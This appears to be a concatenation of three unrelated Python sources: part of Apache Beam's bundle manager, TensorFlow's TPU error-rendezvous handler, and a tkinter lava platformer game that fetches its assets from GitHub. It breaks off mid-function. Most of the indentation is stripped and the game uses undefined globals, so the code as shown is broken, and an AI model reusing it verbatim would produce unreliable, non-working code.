worker_handler_list, # type: Sequence[WorkerHandler]
get_buffer, # type: Callable[[bytes], PartitionableBuffer]
get_input_coder_impl, # type: Callable[[str], CoderImpl]
bundle_descriptor, # type: beam_fn_api_pb2.ProcessBundleDescriptor
progress_frequency=None,
skip_registration=False,
cache_token_generator=FnApiRunner.get_cache_token_generator()
):
"""Set up a bundle manager.
Args:
worker_handler_list
get_buffer (Callable[[str], list])
get_input_coder_impl (Callable[[str], Coder])
bundle_descriptor (beam_fn_api_pb2.ProcessBundleDescriptor)
progress_frequency
skip_registration
"""
self._worker_handler_list = worker_handler_list
self._get_buffer = get_buffer
self._get_input_coder_impl = get_input_coder_impl
self._bundle_descriptor = bundle_descriptor
self._registered = skip_registration
self._progress_frequency = progress_frequency
self._worker_handler = None # type: Optional[WorkerHandler]
self._cache_token_generator = cache_token_generator
def _send_input_to_worker(self,
process_bundle_id, # type: str
read_transform_id, # type: str
byte_streams
):
assert self._worker_handler is not None
data_out = self._worker_handler.data_conn.output_stream(
process_bundle_id, read_transform_id)
for byte_stream in byte_streams:
data_out.write(byte_stream)
data_out.close()
def _register_bundle_descriptor(self):
# type: () -> Optional[ControlFuture]
if self._registered:
registration_future = None
else:
assert self._worker_handler is not None
process_bundle_registration = beam_fn_api_pb2.InstructionRequest(
register=beam_fn_api_pb2.RegisterRequest(
process_bundle_descriptor=[self._bundle_descriptor]))
registration_future = self._worker_handler.control_conn.push(
process_bundle_registration)
self._registered = True
return registration_future
def _select_split_manager(self):
"""TODO(pabloem) WHAT DOES THIS DO"""
unique_names = set(
t.unique_name for t in self._bundle_descriptor.transforms.values())
for stage_name, candidate in reversed(_split_managers):
if (stage_name in unique_names or
(stage_name + '/Process') in unique_names):
split_manager = candidate
break
else:
split_manager = None
return split_manager
def _generate_splits_for_testing(self,
split_manager,
inputs, # type: Mapping[str, PartitionableBuffer]
process_bundle_id):
# type: (...) -> List[beam_fn_api_pb2.ProcessBundleSplitResponse]
split_results = [] # type: List[beam_fn_api_pb2.ProcessBundleSplitResponse]
read_transform_id, buffer_data = only_element(inputs.items())
byte_stream = b''.join(buffer_data)
num_elements = len(
list(
self._get_input_coder_impl(read_transform_id).decode_all(
byte_stream)))
# Start the split manager in case it wants to set any breakpoints.
split_manager_generator = split_manager(num_elements)
try:
split_fraction = next(split_manager_generator)
done = False
except StopIteration:
done = True
# Send all the data.
self._send_input_to_worker(
process_bundle_id, read_transform_id, [byte_stream])
assert self._worker_handler is not None
# Execute the requested splits.
while not done:
if split_fraction is None:
split_result = None
else:
split_request = beam_fn_api_pb2.InstructionRequest(
process_bundle_split=beam_fn_api_pb2.ProcessBundleSplitRequest(
instruction_id=process_bundle_id,
desired_splits={
read_transform_id: beam_fn_api_pb2.
ProcessBundleSplitRequest.DesiredSplit(
fraction_of_remainder=split_fraction,
estimated_input_elements=num_elements)
}))
split_response = self._worker_handler.control_conn.push(
split_request).get() # type: beam_fn_api_pb2.InstructionResponse
for t in (0.05, 0.1, 0.2):
waiting = ('Instruction not running', 'not yet scheduled')
if any(msg in split_response.error for msg in waiting):
time.sleep(t)
split_response = self._worker_handler.control_conn.push(
split_request).get()
if 'Unknown process bundle' in split_response.error:
# It may have finished too fast.
split_result = None
elif split_response.error:
raise RuntimeError(split_response.error)
else:
split_result = split_response.process_bundle_split
split_results.append(split_result)
try:
split_fraction = split_manager_generator.send(split_result)
except StopIteration:
break
return split_results
def process_bundle(self,
inputs, # type: Mapping[str, PartitionableBuffer]
expected_outputs # type: DataOutput
):
# type: (...) -> BundleProcessResult
# Unique id for the instruction processing this bundle.
with BundleManager._lock:
BundleManager._uid_counter += 1
process_bundle_id = 'bundle_%s' % BundleManager._uid_counter
self._worker_handler = self._worker_handler_list[
BundleManager._uid_counter % len(self._worker_handler_list)]
# Register the bundle descriptor, if needed - noop if already registered.
registration_future = self._register_bundle_descriptor()
# Check that the bundle was successfully registered.
if registration_future and registration_future.get().error:
raise RuntimeError(registration_future.get().error)
split_manager = self._select_split_manager()
if not split_manager:
# If there is no split_manager, write all input data to the channel.
for transform_id, elements in inputs.items():
self._send_input_to_worker(process_bundle_id, transform_id, elements)
# Actually start the bundle.
process_bundle_req = beam_fn_api_pb2.InstructionRequest(
instruction_id=process_bundle_id,
process_bundle=beam_fn_api_pb2.ProcessBundleRequest(
process_bundle_descriptor_id=self._bundle_descriptor.id,
cache_tokens=[next(self._cache_token_generator)]))
result_future = self._worker_handler.control_conn.push(process_bundle_req)
split_results = [] # type: List[beam_fn_api_pb2.ProcessBundleSplitResponse]
with ProgressRequester(self._worker_handler,
process_bundle_id,
self._progress_frequency):
if split_manager:
split_results = self._generate_splits_for_testing(
split_manager, inputs, process_bundle_id)
# Gather all output data.
for output in self._worker_handler.data_conn.input_elements(
process_bundle_id,
expected_outputs.keys(),
abort_callback=lambda:
(result_future.is_done() and result_future.get().error)):
if output.transform_id in expected_outputs:
with BundleManager._lock:
self._get_buffer(expected_outputs[output.transform_id]).append(
output.data)
_LOGGER.debug('Wait for the bundle %s to finish.' % process_bundle_id)
result = result_future.get() # type: beam_fn_api_pb2.InstructionResponse
if result.error:
raise RuntimeError(result.error)
if result.process_bundle.requires_finalization:
finalize_request = beam_fn_api_pb2.InstructionRequest(
finalize_bundle=beam_fn_api_pb2.FinalizeBundleRequest(
instruction_id=process_bundle_id))
self._worker_handler.control_conn.push(finalize_request)
return result, split_results
class ParallelBundleManager(BundleManager):
def __init__(
self,
worker_handler_list, # type: Sequence[WorkerHandler]
get_buffer, # type: Callable[[bytes], PartitionableBuffer]
get_input_coder_impl, # type: Callable[[str], CoderImpl]
bundle_descriptor, # type: beam_fn_api_pb2.ProcessBundleDescriptor
progress_frequency=None,
skip_registration=False,
cache_token_generator=None,
**kwargs):
# type: (...) -> None
super(ParallelBundleManager, self).__init__(
worker_handler_list,
get_buffer,
get_input_coder_impl,
bundle_descriptor,
progress_frequency,
skip_registration,
cache_token_generator=cache_token_generator)
self._num_workers = kwargs.pop('num_workers', 1)
def process_bundle(self,
inputs, # type: Mapping[str, PartitionableBuffer]
expected_outputs # type: DataOutput
):
# type: (...) -> BundleProcessResult
part_inputs = [{} for _ in range(self._num_workers)
] # type: List[Dict[str, List[bytes]]]
for name, input in inputs.items():
for ix, part in enumerate(input.partition(self._num_workers)):
part_inputs[ix][name] = part
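# Each partition of the inputs is processed by its own BundleManager in the
# executor below, and the per-partition responses are merged into a single
# InstructionResponse.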
merged_result = None # type: Optional[beam_fn_api_pb2.InstructionResponse]
split_result_list = [
] # type: List[beam_fn_api_pb2.ProcessBundleSplitResponse]
def execute(part_map):
# type: (...) -> BundleProcessResult
bundle_manager = BundleManager(
self._worker_handler_list,
self._get_buffer,
self._get_input_coder_impl,
self._bundle_descriptor,
self._progress_frequency,
self._registered,
cache_token_generator=self._cache_token_generator)
return bundle_manager.process_bundle(part_map, expected_outputs)
with UnboundedThreadPoolExecutor() as executor:
for result, split_result in executor.map(execute, part_inputs):
split_result_list += split_result
if merged_result is None:
merged_result = result
else:
merged_result = beam_fn_api_pb2.InstructionResponse(
process_bundle=beam_fn_api_pb2.ProcessBundleResponse(
monitoring_infos=monitoring_infos.consolidate(
itertools.chain(
result.process_bundle.monitoring_infos,
merged_result.process_bundle.monitoring_infos))),
error=result.error or merged_result.error)
assert merged_result is not None
return merged_result, split_result_list
class ProgressRequester(threading.Thread):
""" Thread that asks SDK Worker for progress reports with a certain frequency.
A callback can be passed to call with progress updates.
"""
def __init__(self,
worker_handler, # type: WorkerHandler
instruction_id,
frequency,
callback=None
):
# type: (...) -> None
super(ProgressRequester, self).__init__()
self._worker_handler = worker_handler
self._instruction_id = instruction_id
self._frequency = frequency
self._done = False
self._latest_progress = None
self._callback = callback
self.daemon = True
def __enter__(self):
if self._frequency:
self.start()
def __exit__(self, *unused_exc_info):
if self._frequency:
self.stop()
def run(self):
while not self._done:
try:
progress_result = self._worker_handler.control_conn.push(
beam_fn_api_pb2.InstructionRequest(
process_bundle_progress=beam_fn_api_pb2.
ProcessBundleProgressRequest(
instruction_id=self._instruction_id))).get()
self._latest_progress = progress_result.process_bundle_progress
if self._callback:
self._callback(self._latest_progress)
except Exception as exn:
_LOGGER.error("Bad progress: %s", exn)
time.sleep(self._frequency)
def stop(self):
self._done = True
class ControlFuture(object):
def __init__(self, instruction_id, response=None):
self.instruction_id = instruction_id
if response:
self._response = response
else:
self._response = None
self._condition = threading.Condition()
def is_done(self):
return self._response is not None
def set(self, response):
with self._condition:
self._response = response
self._condition.notify_all()
def get(self, timeout=None):
if not self._response:
with self._condition:
if not self._response:
self._condition.wait(timeout)
return self._response
class FnApiMetrics(metric.MetricResults):
def __init__(self, step_monitoring_infos, user_metrics_only=True):
"""Used for querying metrics from the PipelineResult object.
step_monitoring_infos: Per step metrics specified as MonitoringInfos.
user_metrics_only: If true, includes user metrics only.
"""
self._counters = {}
self._distributions = {}
self._gauges = {}
self._user_metrics_only = user_metrics_only
self._monitoring_infos = step_monitoring_infos
for smi in step_monitoring_infos.values():
counters, distributions, gauges = \
portable_metrics.from_monitoring_infos(smi, user_metrics_only)
self._counters.update(counters)
self._distributions.update(distributions)
self._gauges.update(gauges)
def query(self, filter=None):
counters = [
MetricResult(k, v, v) for k,
v in self._counters.items() if self.matches(filter, k)
]
distributions = [
MetricResult(k, v, v) for k,
v in self._distributions.items() if self.matches(filter, k)
]
gauges = [
MetricResult(k, v, v) for k,
v in self._gauges.items() if self.matches(filter, k)
]
return {
self.COUNTERS: counters,
self.DISTRIBUTIONS: distributions,
self.GAUGES: gauges
}
def monitoring_infos(self):
# type: () -> List[metrics_pb2.MonitoringInfo]
return [
item for sublist in self._monitoring_infos.values() for item in sublist
]
class RunnerResult(runner.PipelineResult):
def __init__(self, state, monitoring_infos_by_stage, metrics_by_stage):
super(RunnerResult, self).__init__(state)
self._monitoring_infos_by_stage = monitoring_infos_by_stage
self._metrics_by_stage = metrics_by_stage
self._metrics = None
self._monitoring_metrics = None
def wait_until_finish(self, duration=None):
return self._state
def metrics(self):
"""Returns a queryable object including user metrics only."""
if self._metrics is None:
self._metrics = FnApiMetrics(
self._monitoring_infos_by_stage, user_metrics_only=True)
return self._metrics
def monitoring_metrics(self):
"""Returns a queryable object including all metrics."""
if self._monitoring_metrics is None:
self._monitoring_metrics = FnApiMetrics(
self._monitoring_infos_by_stage, user_metrics_only=False)
return self._monitoring_metrics
|
error_handling.py
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===================================================================
"""ErrorRendezvous handler for collecting errors from multiple threads."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import threading
import time
import traceback
from tensorflow.python.framework import errors
from tensorflow.python.platform import tf_logging as logging
_UNINTERESTING_ERRORS = (errors.CancelledError,)
class ErrorRendezvous(object):
"""Resolve errors from multiple threads during TPU execution.
TPU errors can occur on the infeed or outfeed threads as well as the main
training thread.
Depending on which thread "wins" and receives the session error first, we may
end up showing users a confusing and non-actionable error message (session
cancelled) instead of a root cause (e.g. a bad filename).
The rendezvous object provides a location to capture these errors until all
threads terminate. At that point we can choose the most informative error
to report.
"""
def __init__(self, num_sources):
# string -> (message, traceback)
self._errors = {}
self._num_sources = num_sources
self._session_cancel_timer = None
def record_error(self, source, exception, session=None):
"""Report an exception from the given source.
If a session is passed, a timer will be registered to close it after a few
seconds. This is necessary to ensure the main training loop does not hang
if an infeed/outfeed error occurs. We sleep a few seconds to allow a more
interesting error from another thread to propagate.
Args:
source: string, source of the error
exception: Exception being thrown
session: Session to close after delay.
"""
logging.info('Error recorded from %s: %s', source, exception)
stack_trace = traceback.format_exc()
self._errors[source] = (exception, stack_trace)
if session is not None and self._session_cancel_timer is None:
def _cancel_session():
time.sleep(5)
try:
session.close()
except: # pylint: disable=bare-except
pass
self._session_cancel_timer = threading.Thread(target=_cancel_session,)
self._session_cancel_timer.daemon = True
self._session_cancel_timer.start()
def record_done(self, source):
"""Mark execution source `source` as done.
If an error was originally reported from `source` it is left intact.
Args:
source: `str`, source being recorded
"""
logging.info('%s marked as finished', source)
if source not in self._errors:
self._errors[source] = None
@contextlib.contextmanager
def catch_errors(self, source, session=None):
"""Context manager to report any errors within a block."""
try:
yield
except Exception as e: # pylint: disable=broad-except
self.record_error(source, e, session)
def raise_errors(self, timeout_sec=5):
"""Wait for up to `timeout` seconds for all error sources to finish.
Preferentially raise "interesting" errors (errors not in the
_UNINTERESTING_ERRORS) set.
Args:
timeout_sec: Seconds to wait for other error sources.
"""
for _ in range(timeout_sec):
if len(self._errors) == self._num_sources:
break
time.sleep(1)
kept_errors = [(k, v) for (k, v) in self._errors.items() if v is not None]
if not kept_errors:
return
# First check for any interesting errors, then fall back on the session
# cancelled errors etc.
for k, (exc, _) in kept_errors:
if isinstance(exc, _UNINTERESTING_ERRORS):
continue
else:
raise exc
for k, (exc, _) in kept_errors:
raise exc
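# Usage sketch (illustrative only, not part of the original module): one
# rendezvous is shared by the main loop and the infeed/outfeed threads, so the
# most informative captured error is the one ultimately raised.
def _rendezvous_demo(session=None):
  rendezvous = ErrorRendezvous(num_sources=3)
  def infeed_loop():
    with rendezvous.catch_errors('infeed', session):
      pass  # enqueue data here
    rendezvous.record_done('infeed')
  def outfeed_loop():
    with rendezvous.catch_errors('outfeed', session):
      pass  # dequeue results here
    rendezvous.record_done('outfeed')
  workers = [threading.Thread(target=infeed_loop),
             threading.Thread(target=outfeed_loop)]
  for worker in workers:
    worker.start()
  with rendezvous.catch_errors('training', session):
    pass  # run the training loop here
  rendezvous.record_done('training')
  for worker in workers:
    worker.join()
  rendezvous.raise_errors()  # re-raises the most interesting captured error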
|
lavaPlatformer.py
|
from tkinter import *
from tkinter import messagebox
import tkinter.simpledialog as s
import time, sys, random, os, sqlite3, json, threading, requests, shutil
import shop, statistics, settings
from soundplayer import SoundPlayer
filept = os.path.abspath(os.listdir()[0])
class Game:
def __init__(self, st=False, ktc=1):
self.ktc = ktc
self.version = 13.0
self.pathuser = filept.split('/')[2] # user name taken from /home/<user>/... in the absolute path
self.platform_number = 0
self.ff_time = False
self.golevels = []
print("Downloading image content...")
self.set_asset()
print("Done")
self.tk = Tk(className="lavaplatformer")
self.tk.title("lavaPlatformer start-up")
# self.tk.geometry("500x500+10+200")
x = Label(self.tk, text="Welcome on lavaPlatformer!")
x.pack()
self.p = PhotoImage(file="/home/{0}/.lavaPlatformer/Data/showupimage.gif".format(self.pathuser))
self.l = Label(self.tk, image=self.p)
self.l.pack()
self.name = s.askstring("Player name", "Enter player name:") if self.ff_time or st else None
control = self.check_name()
if not control and not os.path.exists("/home/{0}/.lavaPlatformer/user.txt".format(self.pathuser)):
messagebox.showerror("Error", "Invalid name, You can only use characters from a-z, A-Z, numbers and underscore. Your name can not exist two times")
shutil.rmtree("/home/{0}/.lavaPlatformer".format(self.pathuser))
sys.exit()
x.destroy()
self.l.destroy()
self.tk.resizable(0,0)
self.tk.protocol("WM_DELETE_WINDOW", lambda: self.gameover(closing=True))
self.tk.title("LavaPlatformer v{0}".format(self.version))
self.canvas = Canvas(self.tk, width=500, height=500, bg="lightblue")
self.canvas.pack()
self.platforms = [] #List of platforms
self.gameIsRunning = False
self.color = "black"
self.selected = self.color
self.coins = 0
self.diamonds = 0
self.keys = 0
self.lava_dist = 450.0
self.timetxt = self.canvas.create_text(0,0, anchor="nw", text="Time: {0}".format(round(0-0, 2)), font="Purisa 14 bold", fill="blue")
self.cointxt = self.canvas.create_text(0,35, anchor="nw", text="Coins: {0}".format(self.coins), font="Purisa 14 bold", fill="yellow")
self.lavadisttxt = self.canvas.create_text(500,0, anchor="ne", text="Lava Distance: {0}".format(self.lava_dist), font="Purisa 14 bold", fill="red")
self.diamondstxt = self.canvas.create_text(500,35, anchor="ne", text="Diamonds: {0}".format(self.diamonds), font="Purisa 14 bold", fill="purple")
self.keystxt = self.canvas.create_text(500, 70, anchor="ne", text="Keys: {0}".format(self.keys), font="Purisa 14 bold", fill="green")
self.shop = shop.Shop(self, pt="/home/{0}/.lavaPlatformer/".format(self.pathuser))
self.shop.show_button()
self.statistics_menu = statistics.Statistics(self)
self.statistics_menu.show_button()
self.statistics = {
"best_time" : 0,
"platforms_jumped" : 0,
"times_played" : 0,
"best_job_level" : 0,
"best_game_level" : 0,
"skins_owned" : 1
}
self.maxtime = 0.0
def filter_func(self, a):
    return a == 0
def play_sound(self, soundpath, loop=False):
def play():
if loop:
while True:
if self.gameIsRunning:
s = SoundPlayer(soundpath, self)
s.play()
else:
s = SoundPlayer(soundpath, self)
s.play()
t = threading.Thread(target=play)
t.start()
def ask_sounds(self):
sounds = ["chest", "coin", "gameover", "level", "respawn", "start"]
if not os.path.isdir("/home/{0}/.lavaPlatformer/Data/Sounds".format(self.pathuser)):
os.mkdir("/home/{0}/.lavaPlatformer/Data/Sounds".format(self.pathuser))
for sound in sounds:
r = requests.get("https://github.com/OrangoMango/LavaPlatformer/raw/master/Data/Sounds/{0}.mp3".format(sound))
open("/home/{0}/.lavaPlatformer/Data/Sounds/{1}.mp3".format(self.pathuser, sound), "wb").write(r.content)
self.soundspath = "/home/{0}/.lavaPlatformer/Data/Sounds".format(self.pathuser)
def save_user(self):
if not os.path.exists("/home/{0}/.lavaPlatformer/user.txt".format(self.pathuser)):
with open("/home/{0}/.lavaPlatformer/user.txt".format(self.pathuser), "w") as f:
f.write(self.name)
else:
with open("/home/{0}/.lavaPlatformer/user.txt".format(self.pathuser)) as f:
self.name = f.read().rstrip("\n")
def check_name(self):
try:
if self.name in os.listdir("/home/{0}/.lavaPlatformer".format(self.pathuser)):
return False
except:
pass
if self.name == "" or self.name == None or len(self.name) > 15:
return False
l = list(self.name)
words = "abcdefghijklmnopqrstuvwxyz0123456789_"
for ch in l:
if not ch in list(words)+list(words.upper()):
return False
return True
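# Quick illustration (not part of the original game): check_name() accepts a
# short name built from letters, digits and underscores that is not already in
# use as a profile folder, e.g. "Player_1" passes while "bad name!" or "" fail.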
def at_start(self):
def start(e):
self.play_sound("{0}/start.mp3".format(self.soundspath))
self.canvas.delete(txt)
self.canvas.delete(self.shop.id)
self.canvas.delete(self.statistics_menu.id)
self.canvas.delete(self.settings_button.id)
self.shop.job_button.jobs[0]["Jump on platforms"]["progress"] = 0
self.shop.job_button.jobs[1]["Go on transparent platforms"]["progress"] = 0
self.shop.job_button.jobs[2]["Get coins"]["progress"] = 0
self.gameIsRunning = True
self.time1 = round(time.time(), 2)
self.time2 = round(time.time(), 2)
tap_to_start = '''
TAP TO
START
'''
txt = self.canvas.create_text(-100, 250, anchor="center", text=tap_to_start, font="Calibri 45 bold", fill="gray")
self.canvas.tag_bind(txt, "<Button-1>", start)
def load_json_statistics(self, save=False):
if os.path.exists("statistics.json") and not save:
with open("statistics.json", "r") as f:
data = json.load(f)
#print(data)
self.statistics = data
else:
with open("statistics.json", "w") as f:
json.dump(self.statistics, f, indent=4)
if save:
self.statistics["times_played"] += 1
os.chdir(os.path.abspath(filept+"/.."))
os.chdir("/home/{0}/.lavaPlatformer/{1}".format(self.pathuser, self.name))
with open("statistics.json", "w") as f:
json.dump(self.statistics, f, indent=4)
def save_json_data(self, val=None, ff=False, load=False):
if load:
with open("colors.json", "r") as colors_f:
data = json.load(colors_f)
self.selected = data["selected"]
self.from_json = data
# print("Main:", self.selected)
return
if os.path.exists("colors.json") and ff:
with open("colors.json", "r") as colors_f:
data = json.load(colors_f)
self.from_json = data
self.color = data["colors"][data["colors"].index(self.color)]
else:
os.chdir(os.path.abspath(filept+"/.."))
os.chdir("/home/{0}/.lavaPlatformer/{1}".format(self.pathuser, self.name))
with open("colors.json", "w") as colors_f:
data = {
"colors" : val,
"selected" : self.selected
}
self.from_json = data
json.dump(data, colors_f, indent=4)
def set_asset(self):
user = self.pathuser
path = ""#.format(user)
#os.chdir(path)
if not os.path.isdir("/home/{0}/.lavaPlatformer".format(user)):
os.mkdir("/home/{0}/.lavaPlatformer".format(user))
self.ff_time = True
if not os.path.isdir("/home/{0}/.lavaPlatformer/Data".format(user)):
os.mkdir("/home/{0}/.lavaPlatformer/Data".format(user))
r = requests.get("https://github.com/OrangoMango/LavaPlatformer/raw/master/Data/showupimage.gif", allow_redirects=True)
open("/home/{0}/.lavaPlatformer/Data/showupimage.gif".format(user), "wb").write(r.content)
# os.system("cp "+"Data/showupimage.gif "+" /home/{0}/.lavaPlatformer/Data/showupimage.gif".format(user))
if not os.path.isdir("/home/{0}/.lavaPlatformer/Data/Images".format(user)):
os.mkdir("/home/{0}/.lavaPlatformer/Data/Images".format(user))
r = requests.get("https://github.com/OrangoMango/LavaPlatformer/raw/master/Data/Images/chest.gif")
open("/home/{0}/.lavaPlatformer/Data/Images/chest.gif".format(user), "wb").write(r.content)
r = requests.get("https://github.com/OrangoMango/LavaPlatformer/raw/master/Data/Images/jobs.gif")
open("/home/{0}/.lavaPlatformer/Data/Images/jobs.gif".format(user), "wb").write(r.content)
r = requests.get("https://github.com/OrangoMango/LavaPlatformer/raw/master/Data/Images/settings.gif")
open("/home/{0}/.lavaPlatformer/Data/Images/settings.gif".format(user), "wb").write(r.content)
r = requests.get("https://github.com/OrangoMango/LavaPlatformer/raw/master/Data/Images/shop.gif")
open("/home/{0}/.lavaPlatformer/Data/Images/shop.gif".format(user), "wb").write(r.content)
def setup_directory(self):
user = self.pathuser
path = ""#.format(user)
#os.chdir(path)
self.save_user()
if not os.path.exists(path+"/home/{0}/.lavaPlatformer/".format(user)+self.name):
os.mkdir(path+"/home/{0}/.lavaPlatformer/".format(user)+self.name)
print("Downloading sounds...")
self.ask_sounds()
print("Done")
self.path4job = path+"/home/{0}/.lavaPlatformer/{1}/".format(user, self.name)
os.chdir(path+"/home/{0}/.lavaPlatformer/{1}/".format(user, self.name))
if not os.path.exists("../path.txt"):
with open("../path.txt", "w") as f:
f.write(self.soundspath)
else:
with open("../path.txt", "r") as f:
self.soundspath = f.read().rstrip("\n")
var = False
if os.path.exists("data.db"):
var = True
connection = sqlite3.connect("data.db")
cursor = connection.cursor()
sql = "SELECT * FROM data"
cursor.execute(sql)
for d in cursor:
self.coins = int(d[0])
self.diamonds = int(d[1])
self.keys = int(d[2])
self.canvas.itemconfig(self.cointxt, text="Coins: {0}".format(self.coins))
self.canvas.itemconfig(self.diamondstxt, text="Diamonds: {0}".format(self.diamonds))
self.canvas.itemconfig(self.keystxt, text="Keys: {0}".format(self.keys))
connection.close()
os.remove("data.db")
# print("OK")
self.connection = sqlite3.connect("data.db")
self.cursor = self.connection.cursor()
sql = "CREATE TABLE data(coins INTEGER, diamonds INTEGER, keys INTEGER)"
self.cursor.execute(sql)
if not var:
#print("Here")
self.save_json_data(val=[self.color], ff=True)
else:
self.save_json_data(load=True)
self.load_json_statistics()
self.shop.add_job()
self.settings_button = settings.Settings(self)
self.settings_button.show_button()
# self.connection.close()
def mainloop(self):
self.time1 = time.time()
self.time2 = time.time()
ok = True
while True:
if self.gameIsRunning:
try:
self.time2 = time.time()
self.canvas.itemconfig(self.timetxt, text="Time: {0}".format(round(self.time2-self.time1, 2)))
self.canvas.itemconfig(self.cointxt, text="Coins: {0}".format(self.coins))
self.canvas.itemconfig(self.lavadisttxt, text="Lava Distance: {0}".format(self.lava_dist))
self.canvas.itemconfig(self.diamondstxt, text="Diamonds: {0}".format(self.diamonds))
self.canvas.itemconfig(self.keystxt, text="Keys: {0}".format(self.keys))
self.canvas.tag_raise(self.timetxt)
self.canvas.tag_raise(self.cointxt)
self.canvas.tag_raise(self.lavadisttxt)
self.canvas.tag_raise(self.diamondstxt)
self.canvas.tag_raise(self.keystxt)
l.draw()
p.draw()
self.tk.update()
except:
break
time.sleep(0.01)
else:
if ok:
self.maxtime = round(self.time2-self.time1, 2)
ok = False
try:
self.tk.update()
except:
break
time.sleep(0.01)
def gameover(self, errortype="Game Over", closing=False):
ktc = self.ktc
self.play_sound("{0}/gameover.mp3".format(self.soundspath))
if not closing:
messagebox.showerror("Game Over", errortype)
if errortype == "Lava touched you!" or errortype == "You hit the floor too hard":
ask = messagebox.askyesno("Respawn", "Do you want to use %s keys to continue?" % ktc)
if ask:
if self.keys < ktc:
messagebox.showerror("Error", "You don't have enough keys")
ktc = 1
self.ktc = ktc
else:
self.keys -= ktc
self.play_sound("{0}/respawn.mp3".format(self.soundspath))
ktc += 1
self.ktc = ktc
self.canvas.itemconfig(self.keystxt, text="Keys: {0}".format(self.keys))
p.damage = 0
if errortype == "Lava touched you!":
self.canvas.move(l.id, 0, -350)
return
else:
ktc = 1
self.ktc = ktc
else:
ktc = 1
self.ktc = ktc
#print(p.damage)
self.maxtime = round(self.time2-self.time1, 2)
sql = "INSERT INTO data VALUES(?, ?, ?)"
self.cursor.execute(sql, (self.coins, self.diamonds, self.keys))
self.connection.commit()
self.connection.close()
self.save_json_data(val=self.from_json["colors"]+[self.color] if not self.color in self.from_json["colors"] else self.from_json["colors"])
if self.statistics['best_time'] < self.maxtime:
self.statistics['best_time'] = self.maxtime
self.load_json_statistics(True)
self.shop.job_button.save_progress()
try:
self.tk.destroy()
except:
pass
self.gameIsRunning = False
if not closing:
main(ktc=ktc, st = True if errortype=="Game must be restarted after creating" else False)
else:
sys.exit(0)
class Profile:
def __init__(self, game):
self.game = game
self.tk = Tk()
self.tk.title("Profiles")
self.profiles = self.get_profiles()
self.var = StringVar(master=self.tk)
#self.var.set("Orango")
self.var.set(self.getCurrentUser())
self.rdb = []
self.profiles_frame = LabelFrame(self.tk, text="Profiles")
self.profiles_frame.pack()
def show_interface(self):
for prf in self.profiles:
r = Radiobutton(self.profiles_frame, text=prf, variable=self.var, value=prf)
r.pack()
self.rdb.append(r)
self.ok = Button(self.tk, text="SELECT", command=self.select)
self.ok.pack()
self.new = Button(self.tk, text="CREATE", command=self.create)
self.new.pack()
self.dele = Button(self.tk, text="DELETE", command=self.delete)
self.dele.pack()
def delete(self):
s = self.var.get()
if s == self.getCurrentUser():
messagebox.showerror("Error", "Could not delete current profile", master=self.tk)
return
for i in os.listdir(self.game.path4job+"../{0}/".format(s)):
os.remove(self.game.path4job+"../{0}/".format(s)+i)
os.rmdir(self.game.path4job+"../{0}".format(s))
# self.game.gameover(closing=True)
messagebox.showinfo("Info", "Profile deleted", master=self.tk)
self.tk.destroy()
def create(self):
os.remove(self.game.path4job+"../user.txt")
self.tk.destroy()
self.game.gameover(errortype="Game must be restarted after creating")
def getCurrentUser(self):
with open(self.game.path4job+"../user.txt", "r") as f:
return f.read()
def select(self):
s = self.var.get()
with open(self.game.path4job+"../user.txt", "w") as f:
f.write(s)
messagebox.showinfo("Info", "User {0} selected".format(s), master=self.tk)
self.tk.destroy()
self.game.gameover(errortype="Game must be restarted")
def get_profiles(self):
data = []
# print(os.listdir(self.game.path4job+"../"))
os.chdir(os.path.abspath(filept+"/../"))
for i in os.listdir(self.game.path4job+"../"):
if not i.endswith(".txt") and not i == "Data":
data.append(i)
return data
class Player:
def __init__(self, game, lava):
self.lava = lava
self.on_platform_OS = "computer" #TO SET TO COMPUTER
self.game = game
self.id_x = self.game.canvas.create_rectangle(40, 115, 75, 150, fill=self.game.selected, tags="Player")
self.name = self.game.canvas.create_text(58, 100, anchor="center", text=self.game.name, tags="Player")
self.id = "Player"
self.game.tk.bind("<KeyPress>" if self.on_platform_OS == "computer" else "<Motion>", self.move)
self.x, self.y = 0, 0
self.damage = 0
self.level = 1
self.game.canvas.tag_bind(self.id, "<Button-1>", self.switch)
def switch(self, event):
if self.game.gameIsRunning == False:
#tk = Toplevel(self.game.tk)
prf = Profile(self.game)
prf.show_interface()
def move(self, event):
if not self.game.gameIsRunning:
return
if self.on_platform_OS == "android":
x, y = event.x, event.y
k = None
elif self.on_platform_OS == "computer":
k = event.char
x, y = 0, 0
#print(k)
pos = self.game.canvas.coords(self.id)
if ((x >= 250 and self.on_platform_OS == "android") or (k == "d" and self.on_platform_OS == "computer")) and pos[2] <= 500:
self.game.canvas.move(self.id, 13 if self.on_platform_OS == "computer" else 5, 0)
elif ((x < 250 and self.on_platform_OS == "android") or (k == "a" and self.on_platform_OS == "computer")) and pos[0] >= 0:
self.game.canvas.move(self.id, -13 if self.on_platform_OS == "computer" else -5, 0)
def draw(self):
self.game.canvas.move(self.id, self.x, self.y)
x = 0
# print("length", len(self.game.platforms))
for platform in self.game.platforms:
# print(platform.last, x)
pl_pos = self.game.canvas.coords(platform.id)
pos = self.game.canvas.coords(self.id)
if self.damage >= 80:
self.game.gameover(errortype="You fell into the void")
if (((pos[3] >= pl_pos[1] and pos[3] <= pl_pos[3]) \
and (pos[2] >= pl_pos[0] and pos[2] <= pl_pos[2]+15)) \
or ((pos[0] >= pl_pos[0] and pos[0] <= pl_pos[2]) and (pos[3] >= pl_pos[1] and pos[3] <= pl_pos[3]))):
if platform.type == "death":
self.game.shop.job_button.jobs[1]["Go on transparent platforms"]["progress"] += 0.5
if self.game.shop.job_button.jobs[1]["Go on transparent platforms"]["progress"] == self.game.shop.job_button.jobs[1]["Go on transparent platforms"]["number"]:
self.game.shop.job_button.jobs[1]["Go on transparent platforms"]["number"] += 2
self.game.shop.job_button.jobs[1]["Go on transparent platforms"]["reward"] += 5
self.game.shop.job_button.jobs[1]["Go on transparent platforms"]["level"] += 1
self.game.diamonds += self.game.shop.job_button.jobs[1]["Go on transparent platforms"]["reward"] - 5
self.game.shop.job_button.jobs[1]["Go on transparent platforms"]["progress"] = 0
